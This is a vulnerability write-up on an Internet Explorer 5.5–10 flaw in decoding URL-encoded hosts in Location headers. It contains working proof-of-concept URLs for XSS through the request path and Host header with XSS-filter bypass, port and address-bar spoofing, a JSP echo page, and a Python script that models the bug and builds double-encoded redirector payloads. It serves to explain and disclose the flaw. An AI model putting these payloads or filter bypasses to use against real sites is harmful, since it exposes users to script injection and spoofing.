References:
http://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html
https://web.archive.org/web/20131107024350/http://blackfan.ru/
Source (JSP test page that echoes the request URI, server name and local port of the request it receives):
RequestURI: <%= request.getRequestURI() %>
Host: <%= request.getServerName() %>
Port: <%= request.getLocalPort() %>
PoC (all IE versions from 5.5 to 10.0 are affected):
XSS via request path + XSS filter bypass + URL-encoding bypass + address bar spoofing
http://blackfan.ru:8080/x?r=http://blackfan.ru/<img/src='x'onerror=alert(1)>/%252e%252e/%252e%252e/
XSS via Host header + XSS filter bypass
http://blackfan.ru:8080/x?r=http://blackfan.ru%252F<img%252Fsrc='x'onerror=alert(1)>%252F.%252e%252F.%252e%252F%253F%2523
Port Spoofing
http://blackfan.ru:8080/x?r=http://www.microsoft.com%253A11/ru-ru/default.aspx
http://blackfan.ru:8080/x?r=http://www.oracle.com%253A31337%252Findex.html%253F
Description
Incorrect handling of a URL-encoded host in the Location header: IE writes the URL-decoded host over the start of the URL-encoded host without truncating the encoded string, so the encoded characters beyond the decoded length survive as a tail.
Example
Location-header:
http://%77%77%77%2E%6D%69%63%72%6F%73%6F%66%74%2E%63%6F%6D/test
Original (encoded) host:
%77%77%77%2E%6D%69%63%72%6F%73%6F%66%74%2E%63%6F%6D
Decoded:
www.microsoft.com
Overlaying the decoded host on the original (the 17 decoded characters replace the first 17 encoded characters; the remainder of the encoded string is kept):
www.microsoft.com
+
%77%77%77%2E%6D%69%63%72%6F%73%6F%66%74%2E%63%6F%6D
=
www.microsoft.com9%63%72%6F%73%6F%66%74%2E%63%6F%6D
Note: www.microsoft.com and %77%77%77%2E%6D%6 have the same length (17 characters), which is why the decoded string covers exactly that prefix of the encoded one. The original note refers to a figure for the exact overlay procedure; the figure is not reproduced here.
It appears that IE does some odd overlaying of the path in its URL-encoded and URL-decoded form.
$ python3 -c "print(len('%77%77%77%2E%6D%6')); print(len('www.microsoft.com'))"
17
17
Result (the leftover tail 9%63%72%6F%73%6F%66%74%2E%63%6F%6D is decoded to 9crosoft.com):
http://www.microsoft.com9crosoft.com/test
XSS via Host example:
Location: http://example.com%2F<xss>%2F%2E%2E%2F%3F%23
Decoded:
example.com/<xss>/../?#
Overlaid (the 23 decoded characters replace the first 23 encoded characters; the trailing 2E%2E%2F%3F%23 of the encoded string survives):
example.com/<xss>/../?#2E%2E%2F%3F%23
Resulting request (the overlaid authority is cut at its first "/", the rest becomes the request path, and the decoded authority lands in the Host header):
GET /<xss>/../?#2E%2E%2F%3F%23 HTTP/1.1
Host: example.com/<xss>/../?#
Port spoofing example:
Location: http://example.com%3A80
Decoded:
example.com:80
Overlaid (the 14 decoded characters replace the first 14 encoded characters; the trailing 80 survives):
example.com:80
+
example.com%3A80
=
example.com:8080
Address bar shows:
example.com:8080
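All three worked examples above (host spoofing, XSS via Host, port spoofing) follow one rule: the decoded authority replaces the first len(decoded) characters of the encoded authority and the rest of the encoded string is kept. The following script, added here as an example and not code from the original write-up or from IE, reproduces that rule and checks it against the three examples. Two parts are assumptions rather than facts from the page: the request model in spoofed_request is generalised from the single "Resulting request" shown above, and redirector_poc assumes the /x?r= endpoint used in the PoCs URL-decodes r once before emitting it in Location (which is why the PoC URLs carry %25XX sequences).

```python
"""Simulation of the IE 5.5-10 overlay bug in Location-header handling.

Added example; not code from the original write-up or from IE. It models
the rule the worked examples follow: the URL-decoded authority is written
over the start of the URL-encoded authority, and whatever part of the
encoded string extends past the decoded length is kept as a tail.
"""
from urllib.parse import unquote


def split_location(location: str):
    """Split 'scheme://authority<rest>' into (scheme, authority, rest).

    A minimal splitter is used instead of urllib.parse.urlsplit because the
    authorities here contain characters such as '<' and '%' that a strict
    parser may reject or normalise.
    """
    scheme, _, remainder = location.partition("://")
    end = len(remainder)
    for delim in "/?#":
        pos = remainder.find(delim)
        if pos != -1:
            end = min(end, pos)
    return scheme, remainder[:end], remainder[end:]


def ie_overlay(encoded: str) -> str:
    """Write the decoded form over the encoded form without truncation."""
    decoded = unquote(encoded)
    # Every %XX escape collapses three characters into one, so
    # len(decoded) <= len(encoded); the difference is the surviving tail.
    return decoded + encoded[len(decoded):]


def address_bar(location: str) -> str:
    """URL IE ends up with after the overlay. The leftover encoded tail is
    decoded once more, which is how %63%72...%6D shows up as 'crosoft.com'
    in the write-up's first example."""
    scheme, authority, rest = split_location(location)
    return f"{scheme}://{unquote(ie_overlay(authority))}{rest}"


def spoofed_request(location: str):
    """(request-target, Host header) as in the write-up's XSS-via-Host
    example: the overlaid authority is cut at its first '/', everything
    from there on is sent as the path, and the Host header carries the
    decoded authority. Generalised from that one example (assumption)."""
    _, authority, rest = split_location(location)
    overlaid = ie_overlay(authority)
    slash = overlaid.find("/")
    path = (overlaid[slash:] if slash != -1 else "") + rest
    return (path or "/"), unquote(authority)


def redirector_poc(location: str) -> str:
    """Value to pass as r= to an open redirector that URL-decodes the
    parameter once before emitting it in Location (assumed behaviour of
    the /x?r= endpoint in the PoCs). Only '%' needs a second encoding."""
    return location.replace("%", "%25")


if __name__ == "__main__":
    # The three Location headers from the write-up.
    examples = [
        "http://%77%77%77%2E%6D%69%63%72%6F%73%6F%66%74%2E%63%6F%6D/test",
        "http://example.com%2F<xss>%2F%2E%2E%2F%3F%23",
        "http://example.com%3A80",
    ]
    for loc in examples:
        _, auth, _ = split_location(loc)
        print("Location:   ", loc)
        print("overlaid:   ", ie_overlay(auth))
        print("address bar:", address_bar(loc))
        path, host = spoofed_request(loc)
        print(f"request:     GET {path} HTTP/1.1 / Host: {host}")
        print("PoC r=:     ", redirector_poc(loc))
        print()
```

Running the script prints, for each of the page's Location headers, the overlaid authority, the address-bar URL, the modelled request line and Host header, and the once-more-encoded value that a single-decoding redirector would need to produce that Location.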